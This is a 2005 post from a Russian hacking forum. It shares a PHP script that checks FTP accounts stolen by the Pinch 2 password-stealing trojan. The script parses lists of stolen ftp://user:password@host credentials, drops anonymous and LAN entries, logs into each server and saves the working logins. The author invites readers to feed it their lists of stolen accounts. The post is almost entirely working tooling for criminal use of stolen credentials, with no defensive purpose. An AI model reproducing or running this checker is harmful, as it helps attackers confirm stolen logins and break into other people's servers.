Чекер ftp-акков (под Пинч2, php)

Discussion in 'PHP' started by drmist, 9 Oct 2005.

  1. drmist

    drmist Member

    Joined:
    8 Oct 2005
    Messages:
    307
    Likes Received:
    94
    Reputations:
    80
    Недавно возникла проблема чекнуть пару сотен акков, в результате чего родился скрипт:
    Code:
    <?
/*
Pinch 2.x ftp-accounts parser v0.9

(c) drmist 2005

icq: 329393
web: www.security-teams.net
*/

$list = "list.txt";
$result = "result.txt";
$err = "error.log";

set_time_limit(0);
flush();
$time = time();

$ftp = @file($list) or die("<b>Cann't open $list</b>");
$fid = @fopen($result, "w") or die("<b>Cann't create $result</b>");
$error = @fopen($err, "w") or die("<b>Cann't create $err</b>");

$total = count($ftp);

$temp = array();
for($i = 0; $i < $total; $i++)
{
  $found = false;
  $ftp[$i] = trim($ftp[$i]); // !!!
  for($j = 0; $j < count($temp); $j++)
    if($temp[$j] === $ftp[$i])
    {
      $found = true;
      break;
    }

  if(!$found)
    $temp[] = $ftp[$i];
}
unset($ftp);
$ftp = $temp;
unset($temp);

sort($ftp);

$unique = count($ftp);

$failed = 0;
$bad = 0;
$valid = 0;

for($i = 0; $i < $unique; $i++)
{
    @$s = $ftp[$i] or fputs($error, "\$s = \$ftp[$i] - error\r\n");
    if(strlen($s) > 0)
    {
      if((!strpos($s, "tp://anonymous:"))&&(!strpos($s, "@10.")))
      {
        $g = array();
        ereg("^ftp://(.*):(.*)@(.{5,})$",$s,$g);

        if(count($g) < 4)
        {
          ereg("^ftp://(.*)@(.{5,}) \(Password: (.*)\)$",$s,$g);
          
          if(count($g) > 3)
          {
            $t = $g[2];
            $g[2] = $g[3];
            $g[3] = $t;
          }
        }

        if(count($g) > 3)
        {
          if(ereg("^([0-9]{1,3}\.){3}[0-9]{1,3}$", $g[3])) // ip2dn
          {
            $s = "";
            @$s = gethostbyaddr($g[3]);
            if(strlen($s) > 0)
              $g[3] = $s;
            else
              fputs($error, $g[3]." - gethostbyaddr() failed\r\n");
          }

          $conn=@ftp_connect($g[3]);
          $login=@ftp_login($conn, $g[1], $g[2]); 

          if(($conn) && ($login))
          {
             echo $g[1]."@".$g[3]."<br>\r\n";
             fputs($fid, "ftp://".$g[1].":".$g[2]."@".$g[3]."\r\n");
             $valid++;
          }
          else
            $failed++;
         
         @ftp_close($conn);
         flush();
      }
      else
        fputs($error, "$s - ereg() failed, \$i = $i\r\n");
    }
    else
      $bad++;
  }
}

fclose($fid);
fclose($error);

echo "<br>\r\n<table border=0 width=300>\r\n";
echo "<tr><td>Total loaded</td><td>$total</td></tr>\r\n";
echo "<tr><td>Unique</td><td>$unique</td></tr>\r\n";
echo "<tr><td colspan=2> </td></tr>\r\n";
echo "<tr><td>Valid</td><td><font color=green>$valid</font></td></tr>\r\n";
echo "<tr><td>Connections failed</td><td><font color=red>$failed</font></td></tr>\r\n";
echo "<tr><td>Anonymous/Lan</td><td><font color=red>$bad</font></td></tr>\r\n";
echo "<tr><td>Errors</td><td><font color=red>".($unique - ($valid+$failed+$bad))."</font></td></tr>\r\n";
echo "<tr><td colspan=2> </td></tr>\r\n";
echo "<tr><td>Time</td><td>".date("i:s", time()-$time)."</td></tr>\r\n</table>";
?>
<script> alert("All done!"); </script>
    Просто скормите ему файл с шеллами - сами все увидите.
     
    #1 drmist, 9 Oct 2005
    Last edited: 9 Oct 2005
(You must log in or sign up to post here.)
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.